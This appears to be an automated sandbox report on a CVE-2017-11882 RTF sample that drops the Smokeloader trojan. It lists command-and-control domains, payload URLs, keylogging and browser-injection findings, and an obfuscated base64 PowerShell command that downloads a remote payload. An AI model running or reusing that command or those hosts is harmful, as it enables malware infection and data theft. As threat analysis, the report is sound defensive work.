            Source: unknownHTTP traffic detected: POST /index.php HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedAccept: */*Referer: http://cpbrvhywlnsy.com/User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64; Trident/7.0; rv:11.0) like GeckoContent-Length: 275Host: prolinice.ga
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Sat, 31 Aug 2024 17:25:32 GMTserver: Apache/2.4.59 (Debian)transfer-encoding: chunkedcontent-type: text/html; charset=utf-8
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Sat, 31 Aug 2024 17:25:40 GMTserver: Apache/2.4.59 (Debian)content-length: 409content-type: text/html; charset=utf-8Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /index.php was not found on this server.</p><p>Additionally, a 404 Not Found error was encountered while trying to use an ErrorDocument to handle the request.</p><hr><address>Apache/2.4.59 (Debian) Server at prolinice.ga Port 80</address></body></html>
            Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not Founddate: Sat, 31 Aug 2024 17:26:53 GMTserver: Apache/2.4.59 (Debian)content-length: 7content-type: text/html; charset=utf-8Data Raw: 03 00 00 00 a0 5f e8 Data Ascii: _
            Source: explorer.exe, 0000000C.00000002.630809600.00000000078EA000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: Http://prolinice.ga/index.phpBB74
            Source: powershell.exe, 00000007.00000002.363808831.0000000002749000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.94.148.16
            Source: powershell.exe, 00000007.00000002.363808831.0000000002749000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://23.94.148.16/90/WEFV.txt
            Source: EQNEDT32.EXE, EQNEDT32.EXE, 00000001.00000002.348951439.0000000000534000.00000004.00000020.00020000.00000000.sdmp, EQNEDT32.EXE, 00000001.00000002.348951439.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.94.148.16/90/verynicebuttersmoothcakeicream.tIF
            Source: EQNEDT32.EXE, 00000001.00000002.348951439.000000000053F000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://23.94.148.16/90/verynicebuttersmoothcakeicream.tIFj
            Source: powershell.exe, 00000007.00000002.366421069.0000000004F03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl06
            Source: powershell.exe, 00000007.00000002.366421069.0000000004F03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/UTN-USERFirst-Hardware.crl06
            Source: powershell.exe, 00000007.00000002.366421069.0000000004F03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/2048ca.crl0
            Source: powershell.exe, 00000007.00000002.366421069.0000000004F03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.entrust.net/server1.crl0
            Source: powershell.exe, 00000007.00000002.366421069.0000000004F03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.globalsign.net/root-r2.crl0
            Source: powershell.exe, 00000007.00000002.366421069.0000000004F03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0
            Source: powershell.exe, 00000007.00000002.366421069.0000000004F03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.pkioverheid.nl/DomOvLatestCRL.crl0
            Source: powershell.exe, 00000007.00000002.363633576.00000000005BA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://go.microsoft.c
            Source: explorer.exe, 0000000C.00000002.628664936.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.374687564.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://java.sun.com
            Source: powershell.exe, 00000007.00000002.365103207.0000000003519000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
            Source: powershell.exe, 00000007.00000002.366421069.0000000004F03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0
            Source: powershell.exe, 00000007.00000002.366421069.0000000004F03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0%
            Source: powershell.exe, 00000007.00000002.366421069.0000000004F03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0-
            Source: powershell.exe, 00000007.00000002.366421069.0000000004F03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com0/
            Source: powershell.exe, 00000007.00000002.366421069.0000000004F03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.comodoca.com05
            Source: powershell.exe, 00000007.00000002.366421069.0000000004F03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net03
            Source: powershell.exe, 00000007.00000002.366421069.0000000004F03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ocsp.entrust.net0D
            Source: explorer.exe, 00000013.00000002.432154791.00000000003DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/
            Source: explorer.exe, 00000013.00000002.432154791.00000000003DA000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/application/x-www-form-urlencodedMozilla/5.0
            Source: explorer.exe, 00000013.00000002.432154791.0000000000394000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.419574794.000000000028E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.421675719.0000000000404000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.628871617.0000000000744000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.628530287.000000000028E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.628826534.00000000003C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000002.628600513.000000000033E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.628599452.0000000000444000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.628577670.00000000003DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/index.php
            Source: explorer.exe, 00000013.00000002.432154791.0000000000394000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000014.00000002.419574794.000000000028E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000015.00000002.421675719.0000000000404000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000016.00000002.628871617.0000000000744000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000017.00000002.628530287.000000000028E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000018.00000002.628826534.00000000003C4000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 00000019.00000002.628600513.000000000033E000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001A.00000002.628599452.0000000000444000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000001B.00000002.628577670.00000000003DE000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/index.phpMozilla/5.0
            Source: explorer.exe, 00000013.00000002.432154791.00000000003D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://prolinice.ga/ndex.php
            Source: powershell.exe, 00000005.00000002.368085766.00000000029D1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.363808831.00000000024F1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
            Source: explorer.exe, 0000000C.00000002.630809600.00000000078EA000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.630243639.0000000003DB1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://wehtwifahcxeheu.com/
            Source: explorer.exe, 0000000C.00000002.630243639.0000000003DB1000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://wehtwifahcxeheu.com/application/x-www-form-urlencodedMozilla/5.0
            Source: explorer.exe, 0000000C.00000002.628664936.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.374687564.00000000001D6000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.autoitscript.com/autoit3
            Source: powershell.exe, 00000007.00000002.366421069.0000000004F03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.digicert.com.my/cps.htm02
            Source: powershell.exe, 00000007.00000002.366421069.0000000004F03000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.diginotar.nl/cps/pkioverheid0
Source: explorer.exe, 0000000C.00000000.375066007.0000000003E98000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.630243639.0000000003E98000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.630243639.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.375317134.0000000007967000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.629766627.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.375066007.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.374893412.000000000260E000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.piriform.com/ccleaner
Source: explorer.exe, 0000000C.00000000.375066007.0000000003E98000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.630243639.0000000003E98000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.630243639.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.375317134.0000000007967000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000002.629766627.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.375066007.0000000003DB1000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.374893412.000000000260E000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv
Source: explorer.exe, 0000000C.00000002.629766627.000000000260E000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.374893412.000000000260E000.00000004.00000001.00020000.00000000.sdmp | String found in binary or memory: http://www.piriform.com/ccleanerxe
Source: explorer.exe, 00000013.00000003.425511981.00000000003DE000.00000004.00000020.00020000.00000000.sdmp, E2E3.tmp.19.dr | String found in binary or memory: https://ac.ecosia.org/autocomplete?q=
Source: explorer.exe, 00000013.00000003.425511981.00000000003DE000.00000004.00000020.00020000.00000000.sdmp, E2E3.tmp.19.dr | String found in binary or memory: https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=
Source: powershell.exe, 00000007.00000002.365103207.0000000003519000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/
Source: powershell.exe, 00000007.00000002.365103207.0000000003519000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/Icon
Source: powershell.exe, 00000007.00000002.365103207.0000000003519000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://contoso.com/License
Source: explorer.exe, 00000013.00000003.425511981.00000000003DE000.00000004.00000020.00020000.00000000.sdmp, E2E3.tmp.19.dr | String found in binary or memory: https://duckduckgo.com/ac/?q=
Source: explorer.exe, 00000013.00000003.425511981.00000000003DE000.00000004.00000020.00020000.00000000.sdmp, E2E3.tmp.19.dr | String found in binary or memory: https://duckduckgo.com/chrome_newtab
Source: explorer.exe, 00000013.00000003.425511981.00000000003DE000.00000004.00000020.00020000.00000000.sdmp, E2E3.tmp.19.dr | String found in binary or memory: https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=
Source: powershell.exe, 00000007.00000002.363808831.0000000002629000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ia803104.us.archive.org
Source: powershell.exe, 00000007.00000002.363583798.00000000002C0000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.366421069.0000000004F59000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000007.00000002.363633576.00000000005B0000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://ia803104.us.archive.org/27/items/vbs_20240726_20240726/vbs.jpg
Source: powershell.exe, 00000005.00000002.368085766.0000000002B22000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://ia803104.us.archive.org/27/items/vbs_20240LR
Source: powershell.exe, 00000007.00000002.365103207.0000000003519000.00000004.00000800.00020000.00000000.sdmp | String found in binary or memory: https://nuget.org/nuget.exe
Source: explorer.exe, 00000013.00000003.425511981.00000000003DE000.00000004.00000020.00020000.00000000.sdmp, E2E3.tmp.19.dr | String found in binary or memory: https://search.yahoo.com/favicon.icohttps://search.yahoo.com/search
Source: explorer.exe, 00000013.00000003.425511981.00000000003DE000.00000004.00000020.00020000.00000000.sdmp, E2E3.tmp.19.dr | String found in binary or memory: https://search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=
Source: powershell.exe, 00000007.00000002.366421069.0000000004F03000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://secure.comodo.com/CPS0
Source: explorer.exe, 0000000C.00000002.628664936.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.374687564.00000000001D6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://support.mozilla.org
Source: E2E3.tmp.19.dr | String found in binary or memory: https://www.google.com/favicon.ico
Source: explorer.exe, 0000000C.00000002.628664936.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.374687564.00000000001D6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org
Source: explorer.exe, 0000000C.00000002.628664936.00000000001D6000.00000004.00000020.00020000.00000000.sdmp, explorer.exe, 0000000C.00000000.374687564.00000000001D6000.00000004.00000020.00020000.00000000.sdmp | String found in binary or memory: https://www.mozilla.org/firefox/52.0.1/releasenotes
Source: unknown | Network traffic detected: HTTP traffic on port 49164 -> 443
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49164

Key, Mouse, Clipboard, Microphone and Screen Capturing

Source: Yara match | File source: 00000019.00000002.628348956.0000000000061000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 00000018.00000002.628416578.00000000000C1000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: Process Memory Space: explorer.exe PID: 2840, type: MEMORYSTR
Source: Yara match | File source: Process Memory Space: explorer.exe PID: 2836, type: MEMORYSTR
Source: Yara match | File source: 7.2.powershell.exe.2878da8.0.raw.unpack, type: UNPACKEDPE
Source: Yara match | File source: 10.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPE
Source: Yara match | File source: 0000000C.00000002.629839810.0000000002801000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.376080124.00000000000C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY
Source: Yara match | File source: 0000000A.00000002.376068215.00000000000A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 26_2_0008162B GetKeyboardState,ToUnicode

E-Banking Fraud

Source: C:\Windows\SysWOW64\explorer.exe | Code function: 22_2_00082EA8 StrStrIA, chrome.exe|opera.exe|msedge.exe
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 22_2_00083862 GetModuleFileNameA,GetCurrentProcessId,wsprintfA,CreateMutexA,GetLastError,RtlInitializeCriticalSection,PathFindFileNameA,lstrcat,Sleep,lstrcmpi,lstrcmpi,GetCommandLineW,CommandLineToArgvW,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,lstrcmpi,lstrcmpi,lstrcmpi,StrStrIA,GetCommandLineA,GetCommandLineA,StrStrIA,GetModuleHandleA,lstrcmpi,GetCommandLineA,StrStrIA,lstrcmpi,GetCommandLineA,StrStrIA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,RtlExitUserThread,wsprintfA,lstrcmpi,CreateToolhelp32Snapshot,Process32First,CloseHandle,Sleep, firefox.exe / iexplore.exe / microsoftedgecp.exe / chrome.exe (the same function matched once for each of the four browser process names)

System Summary

Source: SecuriteInfo.com.Exploit.CVE-2017-11882.123.12869.5405.rtf, type: SAMPLE | Matched rule: Detects RTF documents with non-standard version and embeding one of the object mostly observed in exploit documents. Author: ditekSHen
Source: 0000000C.00000002.629839810.0000000002801000.00000020.80000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000A.00000002.376080124.00000000000C1000.00000004.10000000.00040000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: 0000000A.00000002.376068215.00000000000A0000.00000004.00001000.00020000.00000000.sdmp, type: MEMORY | Matched rule: Windows_Trojan_Smokeloader_4e31426e Author: unknown
Source: Process Memory Space: powershell.exe PID: 3516, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: Process Memory Space: powershell.exe PID: 3628, type: MEMORYSTR | Matched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
Source: C:\Windows\SysWOW64\wscript.exe | Process created: Commandline size = 9402
Source: C:\Windows\SysWOW64\wscript.exe | Process created: Commandline size = 9402
Source: C:\Windows\SysWOW64\wscript.exe | COM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\ProgID
Source: C:\Windows\SysWOW64\wscript.exe | Process created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?JwBo? ? ? ? ?HQ? ? ? ? ?d? ? ? ? ?Bw? ? ? ? ?HM? ? ? ? ?Og? ? ? ? ?v? ? ? ? ?C8? ? ? ? ?aQBh? ? ? ? ?Dg? ? ? ? ?M? ? ? ? ?? ? ? ? ?z? ? ? ? ?DE? ? ? ? ?M? ? ? ? ?? ? ? ? ?0? ? ? ? ?C4? ? ? ? ?dQBz? ? ? ? ?C4? ? ? ? ?YQBy? ? ? ? ?GM? ? ? ? ?a? ? ? ? ?Bp? ? ? ? ?HY? ? ? ? ?ZQ? ? ? ? ?u? ? ? ? ?G8? ? ? ? ?cgBn? ? ? ? ?C8? ? ? ? ?Mg? ? ? ? ?3? ? ? ? ?C8? ? ? ? ?aQB0? ? ? ? ?GU? ? ? ? ?bQBz? ? ? ? ?C8? ? ? ? ?dgBi? ? ? ? ?HM? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?Xw? ? ? ? ?y? ? ? ? ?D? ? ? ? ?? ? ? ? ?Mg? ? ? ? ?0? ? ? ? ?D? ? ? ? ?? ? ? ? ?Nw? ? ? ? ?y? ? ? ? ?DY? ? ? ? ?LwB2? ? ? ? ?GI? ? ? ? ?cw? ? ? ? ?u? ? ? ? ?Go? ? ? ? ?c? ? ? ? ?Bn? ? ? ? ?Cc? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Hc? ? ? ? ?ZQBi? ? ? ? ?EM? ? ? ? ?b? ? ? ? ?Bp? ? ? ? ?GU? ? ? ? ?bgB0? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?E4? ? ? ? ?ZQB3? ? ? ? ?C0? ? ? ? ?TwBi? ? ? ? ?Go? ? ? ? ?ZQBj? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?BT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?E4? ? ? ? ?ZQB0? ? ? ? ?C4? ? ? ? ?VwBl? ? ? ? ?GI? ? ? ? ?QwBs? ? ? ? ?Gk? ? ? ? ?ZQBu? ? ? ? ?HQ? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?Gk? ? ? ? ?bQBh? ? ? ? ?Gc? ? ? ? ?ZQBC? ? ? ? ?Hk? ? ? ? ?d? ? ? ? ?Bl? ? ? ? ?HM? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?J? ? ? ? ?B3? ? ? ? ?GU? ? ? ? ?YgBD? ? ? ? ?Gw? ? ? ? ?aQBl? ? ? ? ?G4? ? ? ? ?d? ? ? ? ?? ? ? ? ?u? ? ? ? ?EQ? ? ? ? ?bwB3? ? ? ? ?G4? ? ? ? ?b? ? ? ? ?Bv? ? ? ? ?GE? ? ? ? ?Z? ? ? ? ?BE? ? ? ? ?GE? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?VQBy? ? ? ? ?Gw? ? ? ? ?KQ? ? ? ? ?7? ? ? ? ?CQ? ? ? ? ?aQBt? ? ? ? ?GE? ? ? ? ?ZwBl? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?I? ? ? ? ?? ? ? ? ?9? ? ? ? ?C? ? ? ? ?? ? ? ? ?WwBT? ? ? ? ?Hk? ? ? ? ?cwB0? ? ? ? ?GU? ? ? ? ?bQ? ? ? ? ?u? ? ? ? ?FQ? ? ? ? ?ZQB4? ? ? ? ?HQ? ? ? ? ?LgBF? ? ? ? ?G4? ? ? ? ?YwBv? ? ? ? ?GQ? ? ? ? ?aQBu? ? ? ? ?Gc? ? ? ? ?XQ? ? ? ? ?6? ? ? ? ?Do? ? ? ? ?VQBU? ? ? ? ?EY? ? ? ? ?O? ? ? ? ?? ? ? ? ?u? ? ? ? ?Ec? ? ? ? ?ZQB0? ? ? ? ?FM? ? ? ? ?d? ? ? ? ?By? ? ? ? ?Gk? ? ? ? ?bgBn? ? ? ? ?Cg? ? ? ? ?J? ? ? ? ?Bp? ? ? ? ?G0? ? ? ? ?YQBn? ? ? ? ?GU? ? ? ? ?QgB5? ? ? ? ?HQ? ? ? ? ?ZQBz? ? ? ? ?Ck? ? ? ? ?Ow? ? ? ? ?k? ? ? ? ?HM? ? ? ? ?d? ? ? ? ?Bh? ? ? ? ?HI? ? ? ? ?d? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?EI? ? ? ? ?QQBT? ? ? ? ?EU? ? ? ? ?Ng? ? ? ? ?0? ? ? ? ?F8? ? ? ? ?UwBU? ? ? ? ?EE? ? ? ? ?UgBU? ? ? ? ?D4? ? ? ? ?Pg? ? ? ? ?n? ? ? ? ?Ds? ? ? ? ?J? ? ? ? ?Bl? ? ? ? ?G4? ? ? ? ?Z? ? ? ? ?BG? ? ? ? ?Gw? ? ? ? ?YQBn? ? ? ? ?C? ? ? ? ?? ? ? ? ?PQ? ? ? ? ?g? ? ? ? ?Cc? ? ? ? ?P? ? ? ? ?? ? ? ? ?8? ? ? ? ?E
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\SysWOW64\wscript.exe | Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Memory allocated: 770B0000 page execute and read and write
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Memory allocated: 770B0000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\gwseuha | Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe | Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe | Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe | Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe | Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\SysWOW64\explorer.exe | Memory allocated: 770B0000 page execute and read and write
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 10_2_00402F5D RtlCreateUserThread,NtTerminateProcess
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 10_2_004014BF NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 10_2_00402321 NtQuerySystemInformation,NtQueryInformationProcess
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 10_2_004025D3 NtClose
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 10_2_004014D6 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 10_2_004022D8 NtQuerySystemInformation,NtQueryInformationProcess
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 10_2_004022D9 NtQuerySystemInformation,NtQueryInformationProcess
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 10_2_004022E5 NtQuerySystemInformation,NtQueryInformationProcess
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 10_2_004014E8 NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 10_2_004014EB NtDuplicateObject,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection,NtCreateSection,NtMapViewOfSection,NtMapViewOfSection
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 10_2_004022F7 NtQuerySystemInformation,NtQueryInformationProcess
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 10_2_00402686 NtClose
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 10_2_0040328D GetModuleHandleA,Sleep,MapViewOfFile,LocalAlloc,OpenProcessToken,NtOpenKey,wcsstr
Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe | Code function: 10_2_004030BF RtlCreateUserThread,NtTerminateProcess
Source: C:\Windows\explorer.exe | Code function: 12_2_02802FAC NtQueryInformationProcess,NtQueryInformationProcess,ReadProcessMemory,ReadProcessMemory,WriteProcessMemory
Source: C:\Windows\explorer.exe | Code function: 12_2_02804760 NtCreateSection
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 19_2_000C4B92 RtlMoveMemory,NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 19_2_000C33C3 NtQueryInformationFile
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 19_2_000C342B NtQueryObject,NtQueryObject,RtlMoveMemory
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 19_2_000C349B CreateFileW,OpenProcess,NtQueryInformationProcess,NtQueryInformationProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,lstrcmpiW,NtQueryObject,StrRChrW,StrRChrW,lstrcmpiW,GetFileSize,SetFilePointer,SetFilePointer,ReadFile,SetFilePointer,CloseHandle,CloseHandle,CloseHandle
Source: C:\Windows\explorer.exe | Code function: 20_2_000638B0 NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 21_2_00081016 RtlMoveMemory,NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 22_2_00083D8D RtlMoveMemory,RtlMoveMemory,NtUnmapViewOfSection
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 22_2_00082E1B OpenProcess,lstrcmpi,NtQueryInformationProcess,NtQueryInformationProcess,StrStrIW
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 22_2_00081F4E NtCreateSection,NtMapViewOfSection
